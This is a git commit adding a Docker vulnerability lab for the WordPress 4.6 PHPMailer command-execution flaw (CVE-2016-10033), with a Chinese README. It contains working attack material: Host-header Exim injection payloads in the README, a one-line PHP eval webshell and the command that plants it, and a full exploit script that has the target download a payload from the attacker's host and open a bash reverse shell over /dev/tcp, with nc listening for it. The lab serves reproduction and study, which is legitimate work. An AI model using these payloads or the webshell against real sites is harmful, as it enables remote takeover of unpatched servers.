(Add Vul: WordPress) WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)

2025-05-08 03:27:21 +00:00 · 2017-06-17 01:33:43 +08:00 · 2017-06-17 01:33:43 +08:00 · ae62313f75
commit ae62313f75
parent 6c3dd7ad97
10 changed files with 1082 additions and 0 deletions
--- a/w/wordpress/6/Dockerfile
+++ b/w/wordpress/6/Dockerfile
@ -0,0 +1,34 @@
+FROM medicean/vulapps:base_lamp
+MAINTAINER Medici.Yan <Medici.Yan@Gmail.com>
+
+ARG WP_URL=http://oe58q5lw3.bkt.clouddn.com/w/wordpress/wordpress/wordpress-4.6.tar.gz
+ARG WPCLI_URL=http://oe58q5lw3.bkt.clouddn.com/w/wordpress/wp-cli/wp-cli.phar
+
+COPY src/wordpress.sql /tmp/wordpress.sql
+COPY src/apache2.conf /etc/apache2/apache2.conf
+RUN set -x \
+    && apt-get update \
+    && apt-get install -y --force-yes php5-mysql php5-dev php5-gd php5-memcache php5-pspell php5-snmp snmp php5-xmlrpc libapache2-mod-php5 php5-cli unzip wget exim4 \
+    && ln -s /etc/apache2/mods-available/rewrite.load /etc/apache2/mods-enabled/ \
+    && rm -rf /var/www/html/* \
+    && wget -qO /tmp/wordpress.tar.gz $WP_URL \
+    && tar -zxf /tmp/wordpress.tar.gz -C /var/www/html --strip-components=1 \
+    && rm -rf /tmp/wordpress.tar.gz
+
+COPY src/.htaccess /var/www/html/.htaccess
+COPY src/wp-config.php /var/www/html/wp-config.php
+
+RUN set -x \
+    && wget -qO /usr/bin/wp $WPCLI_URL \
+    && chmod a+x /usr/bin/wp \
+    && chown -R www-data:www-data /var/www/html/ \
+    && /etc/init.d/mysql start \
+    && mysql -e "CREATE DATABASE wordpress DEFAULT CHARACTER SET utf8;" -uroot -proot \
+    && mysql -e "use wordpress;source /tmp/wordpress.sql;" -uroot -proot \
+    && rm -f /tmp/wordpress.sql
+
+COPY src/start.sh /start.sh
+RUN chmod a+x /start.sh
+
+EXPOSE 80
+CMD ["/start.sh"]
--- a/w/wordpress/6/README.md
+++ b/w/wordpress/6/README.md
@ -0,0 +1,114 @@
+## WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)
+
+### 漏洞信息
+
+ WordPress 是一种使用 PHP 语言开发的博客平台，用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统（CMS）来使用。WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞，攻击者只需巧妙地构造出一个恶意邮箱地址，即可写入任意文件，造成远程命令执行的危害。
+
+### 影响版本
+
+WordPress <= 4.6
+
+### 镜像信息
+
+类型 | 用户名 | 密码
+:-:|:-:|:-:
+Mysql | root | root
+/wp-admin/ | admin | admin123
+
+### 获取环境:
+
+1. 拉取镜像到本地
+
+ ```
+$ docker pull medicean/vulapps:w_wordpress_6
+ ```
+
+2. 启动环境
+
+ ```
+$ docker run -d -p 8000:80 medicean/vulapps:w_wordpress_6
+ ```
+ > `-p 8000:80` 前面的 8000 代表物理机的端口，可随意指定。 
+
+ 访问 http://127.0.0.1:8000 看到 WordPress 主界面代表启动成功
+
+
+### POC
+
+> 假如目标地址为： http://127.0.0.1:8000/
+
+1. 把下面的HTTP报文复制到 BurpSuite Repeater 中，点击 Go 按钮，填写目标 IP 和 端口（例如, IP填 127.0.0.1 端口填 80）
+
+```
+POST /wp-login.php?action=lostpassword HTTP/1.1
+Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}vuln}} null)
+Connection: close
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
+Accept: */*
+Content-Length: 56
+Content-Type: application/x-www-form-urlencoded
+
+wp-submit=Get+New+Password&redirect_to=&user_login=admin
+```
+
+2. 访问：http://127.0.0.1:8000/vuln
+
+看到返回状态码为 200 代表已经成功创建了 `/var/www/html/vuln` 文件
+
+> 可在发包之前访问该地址，会出现 404
+
+### Exp
+
+思路： 在远程 HTTP 服务器上创建一个文本文件，通过 `wget` 下载到目标机器上
+
+#### 向目标写 WebShell（强烈不推荐）
+
+> 都能命令执行了，还传什么 WebShell
+
+1. 执行命令如下：
+
+```
+/usr/bin/wget --output-document /var/www/html/webshell.php raw.githubusercontent.com/medicean/vulapps/master/w/wordpress/6/webshell.php
+```
+
+> 注意： 
+> 1. 远程 URL 中不要有 `http://`
+> 2. 所有字母必须小写
+> 3. 所有 / 用 `${substr{0}{1}{$spool_directory}}` 代替
+> 4. 所有 空格 用 `${substr{10}{1}{$tod_log}}` 代替
+
+报文如下(根据实际情况替换 user_login, 默认是 admin)：
+
+```
+POST /wp-login.php?action=lostpassword HTTP/1.1
+Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}webshell.php${substr{10}{1}{$tod_log}}raw.githubusercontent.com${substr{0}{1}{$spool_directory}}medicean${substr{0}{1}{$spool_directory}}vulapps${substr{0}{1}{$spool_directory}}master${substr{0}{1}{$spool_directory}}w${substr{0}{1}{$spool_directory}}wordpress${substr{0}{1}{$spool_directory}}6${substr{0}{1}{$spool_directory}}webshell.php}} null) null)
+Connection: close
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0
+Accept: */*
+Content-Length: 56
+Content-Type: application/x-www-form-urlencoded
+
+wp-submit=Get+New+Password&redirect_to=&user_login=admin
+```
+
+2. 访问 http://127.0.0.1:8000/webshell.php
+
+#### 反弹 Shell（推荐）
+
+远程文本文件内容如果是 bash 脚本，可在下载到目标后，直接用 `/bin/bash` 来执行该文件
+
+1. 下载bash脚本到目标
+
+```
+/usr/bin/wget --output-document /tmp/rce example.com/1.txt
+```
+
+2. 执行
+
+```
+/bin/bash /tmp/rce
+```
+
+### 相关链接
+
+* [WordPress Core 4.6 - Unauthenticated Remote Code Execution (RCE) PoC Exploit](https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html)
--- a/w/wordpress/6/src/.htaccess
+++ b/w/wordpress/6/src/.htaccess
@ -0,0 +1,12 @@
+
+# BEGIN WordPress
+<IfModule mod_rewrite.c>
+RewriteEngine On
+RewriteBase /
+RewriteRule ^index\.php$ - [L]
+RewriteCond %{REQUEST_FILENAME} !-f
+RewriteCond %{REQUEST_FILENAME} !-d
+RewriteRule . /index.php [L]
+</IfModule>
+
+# END WordPress
--- a/w/wordpress/6/src/apache2.conf
+++ b/w/wordpress/6/src/apache2.conf
@ -0,0 +1,221 @@
+# This is the main Apache server configuration file.  It contains the
+# configuration directives that give the server its instructions.
+# See http://httpd.apache.org/docs/2.4/ for detailed information about
+# the directives and /usr/share/doc/apache2/README.Debian about Debian specific
+# hints.
+#
+#
+# Summary of how the Apache 2 configuration works in Debian:
+# The Apache 2 web server configuration in Debian is quite different to
+# upstream's suggested way to configure the web server. This is because Debian's
+# default Apache2 installation attempts to make adding and removing modules,
+# virtual hosts, and extra configuration directives as flexible as possible, in
+# order to make automating the changes and administering the server as easy as
+# possible.
+
+# It is split into several files forming the configuration hierarchy outlined
+# below, all located in the /etc/apache2/ directory:
+#
+#   /etc/apache2/
+#   |-- apache2.conf
+#   |   `--  ports.conf
+#   |-- mods-enabled
+#   |   |-- *.load
+#   |   `-- *.conf
+#   |-- conf-enabled
+#   |   `-- *.conf
+#   `-- sites-enabled
+#       `-- *.conf
+#
+#
+# * apache2.conf is the main configuration file (this file). It puts the pieces
+#   together by including all remaining configuration files when starting up the
+#   web server.
+#
+# * ports.conf is always included from the main configuration file. It is
+#   supposed to determine listening ports for incoming connections which can be
+#   customized anytime.
+#
+# * Configuration files in the mods-enabled/, conf-enabled/ and sites-enabled/
+#   directories contain particular configuration snippets which manage modules,
+#   global configuration fragments, or virtual host configurations,
+#   respectively.
+#
+#   They are activated by symlinking available configuration files from their
+#   respective *-available/ counterparts. These should be managed by using our
+#   helpers a2enmod/a2dismod, a2ensite/a2dissite and a2enconf/a2disconf. See
+#   their respective man pages for detailed information.
+#
+# * The binary is called apache2. Due to the use of environment variables, in
+#   the default configuration, apache2 needs to be started/stopped with
+#   /etc/init.d/apache2 or apache2ctl. Calling /usr/bin/apache2 directly will not
+#   work with the default configuration.
+
+
+# Global configuration
+#
+
+#
+# ServerRoot: The top of the directory tree under which the server's
+# configuration, error, and log files are kept.
+#
+# NOTE!  If you intend to place this on an NFS (or otherwise network)
+# mounted filesystem then please read the Mutex documentation (available
+# at <URL:http://httpd.apache.org/docs/2.4/mod/core.html#mutex>);
+# you will save yourself a lot of trouble.
+#
+# Do NOT add a slash at the end of the directory path.
+#
+#ServerRoot "/etc/apache2"
+ServerName localhost
+#
+# The accept serialization lock file MUST BE STORED ON A LOCAL DISK.
+#
+Mutex file:${APACHE_LOCK_DIR} default
+
+#
+# PidFile: The file in which the server should record its process
+# identification number when it starts.
+# This needs to be set in /etc/apache2/envvars
+#
+PidFile ${APACHE_PID_FILE}
+
+#
+# Timeout: The number of seconds before receives and sends time out.
+#
+Timeout 300
+
+#
+# KeepAlive: Whether or not to allow persistent connections (more than
+# one request per connection). Set to "Off" to deactivate.
+#
+KeepAlive On
+
+#
+# MaxKeepAliveRequests: The maximum number of requests to allow
+# during a persistent connection. Set to 0 to allow an unlimited amount.
+# We recommend you leave this number high, for maximum performance.
+#
+MaxKeepAliveRequests 100
+
+#
+# KeepAliveTimeout: Number of seconds to wait for the next request from the
+# same client on the same connection.
+#
+KeepAliveTimeout 5
+
+
+# These need to be set in /etc/apache2/envvars
+User ${APACHE_RUN_USER}
+Group ${APACHE_RUN_GROUP}
+
+#
+# HostnameLookups: Log the names of clients or just their IP addresses
+# e.g., www.apache.org (on) or 204.62.129.132 (off).
+# The default is off because it'd be overall better for the net if people
+# had to knowingly turn this feature on, since enabling it means that
+# each client request will result in AT LEAST one lookup request to the
+# nameserver.
+#
+HostnameLookups Off
+
+# ErrorLog: The location of the error log file.
+# If you do not specify an ErrorLog directive within a <VirtualHost>
+# container, error messages relating to that virtual host will be
+# logged here.  If you *do* define an error logfile for a <VirtualHost>
+# container, that host's errors will be logged there and not here.
+#
+ErrorLog ${APACHE_LOG_DIR}/error.log
+
+#
+# LogLevel: Control the severity of messages logged to the error_log.
+# Available values: trace8, ..., trace1, debug, info, notice, warn,
+# error, crit, alert, emerg.
+# It is also possible to configure the log level for particular modules, e.g.
+# "LogLevel info ssl:warn"
+#
+LogLevel warn
+
+# Include module configuration:
+IncludeOptional mods-enabled/*.load
+IncludeOptional mods-enabled/*.conf
+
+# Include list of ports to listen on
+Include ports.conf
+
+
+# Sets the default security model of the Apache2 HTTPD server. It does
+# not allow access to the root filesystem outside of /usr/share and /var/www.
+# The former is used by web applications packaged in Debian,
+# the latter may be used for local directories served by the web server. If
+# your system is serving content from a sub-directory in /srv you must allow
+# access here, or in any related virtual host.
+<Directory />
+    Options FollowSymLinks
+    AllowOverride None
+    Require all denied
+</Directory>
+
+<Directory /usr/share>
+    AllowOverride None
+    Require all granted
+</Directory>
+
+<Directory /var/www/>
+    Options FollowSymLinks
+    AllowOverride All
+    Require all granted
+</Directory>
+
+#<Directory /srv/>
+#   Options Indexes FollowSymLinks
+#   AllowOverride None
+#   Require all granted
+#</Directory>
+
+
+
+
+# AccessFileName: The name of the file to look for in each directory
+# for additional configuration directives.  See also the AllowOverride
+# directive.
+#
+AccessFileName .htaccess
+
+#
+# The following lines prevent .htaccess and .htpasswd files from being
+# viewed by Web clients.
+#
+<FilesMatch "^\.ht">
+    Require all denied
+</FilesMatch>
+
+
+#
+# The following directives define some format nicknames for use with
+# a CustomLog directive.
+#
+# These deviate from the Common Log Format definitions in that they use %O
+# (the actual bytes sent including headers) instead of %b (the size of the
+# requested file), because the latter makes it impossible to detect partial
+# requests.
+#
+# Note that the use of %{X-Forwarded-For}i instead of %h is not recommended.
+# Use mod_remoteip instead.
+#
+LogFormat "%v:%p %h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" vhost_combined
+LogFormat "%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"" combined
+LogFormat "%h %l %u %t \"%r\" %>s %O" common
+LogFormat "%{Referer}i -> %U" referer
+LogFormat "%{User-agent}i" agent
+
+# Include of directories ignores editors' and dpkg's backup files,
+# see README.Debian for details.
+
+# Include generic snippets of statements
+IncludeOptional conf-enabled/*.conf
+
+# Include the virtual host configurations:
+IncludeOptional sites-enabled/*.conf
+
+# vim: syntax=apache ts=4 sw=4 sts=4 sr noet
--- a/w/wordpress/6/src/start.sh
+++ b/w/wordpress/6/src/start.sh
@ -0,0 +1,6 @@
+#!/bin/bash
+/etc/init.d/mysql restart
+/etc/init.d/apache2 restart
+/etc/init.d/exim4 start
+
+/usr/bin/tail -f /dev/null
--- a/w/wordpress/6/src/wordpress.sql
+++ b/w/wordpress/6/src/wordpress.sql
--- a/w/wordpress/6/src/wp-config.php
+++ b/w/wordpress/6/src/wp-config.php
@ -0,0 +1,97 @@
+<?php
+/**
+ * The base configuration for WordPress
+ *
+ * The wp-config.php creation script uses this file during the
+ * installation. You don't have to use the web site, you can
+ * copy this file to "wp-config.php" and fill in the values.
+ *
+ * This file contains the following configurations:
+ *
+ * * MySQL settings
+ * * Secret keys
+ * * Database table prefix
+ * * ABSPATH
+ *
+ * @link https://codex.wordpress.org/Editing_wp-config.php
+ *
+ * @package WordPress
+ */
+
+$home = 'http://'.$_SERVER['HTTP_HOST'];
+$siteurl = 'http://'.$_SERVER['HTTP_HOST'];
+define('WP_HOME', $home);
+define('WP_SITEURL', $siteurl);
+// disable auto update
+define('WP_AUTO_UPDATE_CORE', false);
+define('AUTOMATIC_UPDATER_DISABLED', true);
+
+// ** MySQL settings - You can get this info from your web host ** //
+/** The name of the database for WordPress */
+define('DB_NAME', 'wordpress');
+
+/** MySQL database username */
+define('DB_USER', 'root');
+
+/** MySQL database password */
+define('DB_PASSWORD', 'root');
+
+/** MySQL hostname */
+define('DB_HOST', 'localhost');
+
+/** Database Charset to use in creating database tables. */
+define('DB_CHARSET', 'utf8mb4');
+
+/** The Database Collate type. Don't change this if in doubt. */
+define('DB_COLLATE', '');
+
+/**#@+
+ * Authentication Unique Keys and Salts.
+ *
+ * Change these to different unique phrases!
+ * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
+ * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
+ *
+ * @since 2.6.0
+ */
+define('AUTH_KEY',         '|~ L&jap4kvq@;G~5sDuFh2zS?|/nm!Mi@Nig,? Sd{_o;r=jIzAMiqh,w^F;]VG');
+define('SECURE_AUTH_KEY',  '|ri$rn^.!ytc?P:?N4cgXj)+mZP>e@/eto;k~q+Wr=>|G}7<GC:>K*vo^gpgjpr:');
+define('LOGGED_IN_KEY',    'yhRnN[yd}.zV?Ba)Wk_Y)P)@>u@ED)u!,<Ur]9#D3)v@zR|ia%fib(#CjT5-(bR:');
+define('NONCE_KEY',        'BH}kstJ}X?O%BDrI^U#Y;Iv$5)w.5Cgiyy4iT$##t(j3m&,q[wG29.~WiootKkU-');
+define('AUTH_SALT',        '&{_(MzBd}0g*>r[EAf07D*qkA?a:I5p_^Qcwv>8a]w1rG0-1k4bFhuu2n?LG`uQX');
+define('SECURE_AUTH_SALT', ' SDc2t5sk+Do$9+3v#}~5* QIOM?C?d7uo9R)82uKbM=!supD&+25z=Y0cSg2a]g');
+define('LOGGED_IN_SALT',   'iuK$_X_TM?w:}g:Zb^DBxJU,~>=zW=d+_.EA5?H*0qq`L|(0F@D]Km(2y{s1i}mG');
+define('NONCE_SALT',       'A-3GiRCT}lvfWITxfb1._O4PjCO743a]z=.99NL(_`6%-khb.9iy*S%=QYxxxGPt');
+
+/**#@-*/
+
+/**
+ * WordPress Database Table prefix.
+ *
+ * You can have multiple installations in one database if you give each
+ * a unique prefix. Only numbers, letters, and underscores please!
+ */
+$table_prefix  = 'wp_';
+
+/**
+ * For developers: WordPress debugging mode.
+ *
+ * Change this to true to enable the display of notices during development.
+ * It is strongly recommended that plugin and theme developers use WP_DEBUG
+ * in their development environments.
+ *
+ * For information on other constants that can be used for debugging,
+ * visit the Codex.
+ *
+ * @link https://codex.wordpress.org/Debugging_in_WordPress
+ */
+define('WP_DEBUG', false);
+
+/* That's all, stop editing! Happy blogging. */
+
+/** Absolute path to the WordPress directory. */
+if ( !defined('ABSPATH') )
+	define('ABSPATH', dirname(__FILE__) . '/');
+
+/** Sets up WordPress vars and included files. */
+require_once(ABSPATH . 'wp-settings.php');
--- a/w/wordpress/6/webshell.php
+++ b/w/wordpress/6/webshell.php
@ -0,0 +1 @@
+<?php @eval($_POST['ant']);?>
--- a/w/wordpress/6/wordpress-rce-exploit.sh
+++ b/w/wordpress/6/wordpress-rce-exploit.sh
@ -0,0 +1,187 @@
+#!/bin/bash
+#
+#      __                     __   __  __           __
+#     / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
+#    / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
+#   / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  )
+#  /_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/
+#            /____/
+#
+#
+# WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
+# CVE-2016-10033
+#
+# wordpress-rce-exploit.sh (ver. 1.0)
+#
+#
+# Discovered and coded by
+#
+# Dawid Golunski (@dawid_golunski)
+# https://legalhackers.com
+#
+# ExploitBox project:
+# https://ExploitBox.io
+#
+# Full advisory URL:
+# https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
+#
+# Exploit src URL:
+# https://exploitbox.io/exploit/wordpress-rce-exploit.sh
+#
+#
+# Tested on WordPress 4.6:
+# https://github.com/WordPress/WordPress/archive/4.6.zip
+#
+# Usage:
+# ./wordpress-rce-exploit.sh target-wordpress-url
+#
+#
+# Disclaimer:
+# For testing purposes only
+#
+#
+# -----------------------------------------------------------------
+#
+# Interested in vulns/exploitation?
+#
+#
+#                        .;lc'
+#                    .,cdkkOOOko;.
+#                 .,lxxkkkkOOOO000Ol'
+#             .':oxxxxxkkkkOOOO0000KK0x:'
+#          .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
+#       ':oxxxxxxxxxxo;.       .:oOKKKXXXNNNNOl.
+#      '';ldxxxxxdc,.              ,oOXXXNNNXd;,.
+#     .ddc;,,:c;.         ,c:         .cxxc:;:ox:
+#     .dxxxxo,     .,   ,kMMM0:.  .,     .lxxxxx:
+#     .dxxxxxc     lW. oMMMMMMMK  d0     .xxxxxx:
+#     .dxxxxxc     .0k.,KWMMMWNo :X:     .xxxxxx:
+#     .dxxxxxc      .xN0xxxxxxxkXK,      .xxxxxx:
+#     .dxxxxxc    lddOMMMMWd0MMMMKddd.   .xxxxxx:
+#     .dxxxxxc      .cNMMMN.oMMMMx'      .xxxxxx:
+#     .dxxxxxc     lKo;dNMN.oMM0;:Ok.    'xxxxxx:
+#     .dxxxxxc    ;Mc   .lx.:o,    Kl    'xxxxxx:
+#     .dxxxxxdl;. .,               .. .;cdxxxxxx:
+#     .dxxxxxxxxxdc,.              'cdkkxxxxxxxx:
+#      .':oxxxxxxxxxdl;.       .;lxkkkkkxxxxdc,.
+#          .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
+#             .':oxxxxxxxxx.ckkkkkkkkxl,.
+#                 .,cdxxxxx.ckkkkkxc.
+#                    .':odx.ckxl,.
+#                        .,.'.
+#
+# https://ExploitBox.io
+#
+# https://twitter.com/Exploit_Box
+#
+# -----------------------------------------------------------------
+
+
+
+rev_host="192.168.57.1"
+
+function prep_host_header() {
+      cmd="$1"
+      rce_cmd="\${run{$cmd}}";
+
+      # replace / with ${substr{0}{1}{$spool_directory}}
+      #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
+      rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
+
+      # replace ' ' (space) with
+      #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
+      rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
+      #return "target(any -froot@localhost -be $rce_cmd null)"
+      host_header="target(any -froot@localhost -be $rce_cmd null)"
+      return 0
+}
+
+
+#cat exploitbox.ans
+intro="
+DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
+bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
+G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
+G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
+IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
+IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
+X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
+b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
+NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
+TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
+QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
+NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
+G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
+eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
+WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
+TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
+ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
+MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
+G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
+WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
+NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
+MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
+X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
+bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
+intro2="
+ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
+fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
+MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
+ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
+aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
+fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
+ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
+bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
+ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
+ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
+bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
+cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
+echo "$intro"  | base64 -d
+echo "$intro2" | base64 -d
+
+if [ "$#" -ne 1 ]; then
+echo -e "Usage:\n$0 target-wordpress-url\n"
+exit 1
+fi
+target="$1"
+echo -ne "\e[91m[*]\033[0m"
+read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
+echo
+
+
+if [ "$choice" == "y" ]; then
+
+echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
+echo -e "\e[92m[+]\033[0m Connected to the target"
+
+# Serve payload/bash script on :80
+RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
+echo "$RCE_exec_cmd" > rce.txt
+python -mSimpleHTTPServer 80 2>/dev/null >&2 &
+hpid=$!
+
+# Save payload on the target in /tmp/rce
+cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
+prep_host_header "$cmd"
+curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
+echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
+
+# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
+cmd="/bin/bash /tmp/rce"
+prep_host_header "$cmd"
+curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
+echo -e "\n\e[92m[+]\033[0m Payload executed!"
+
+echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
+nc -vv -l 1337
+echo
+else
+echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
+exit 0
+
+fi
+
+
+echo "Exiting..."
+exit 0
+
--- a/w/wordpress/README.md
+++ b/w/wordpress/README.md
@ -6,3 +6,4 @@ WordPress
 3. [WordPress CYSTEME Finder 1.3 任意文件读取漏洞](3/)
 4. [WordPress Plugin Product Catalog 8 1.2.0 SQL注入漏洞](4/)
 5. [WordPress 4.7.0/4.7.1 REST API 内容注入漏洞](5/)
+6. [WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)](6/)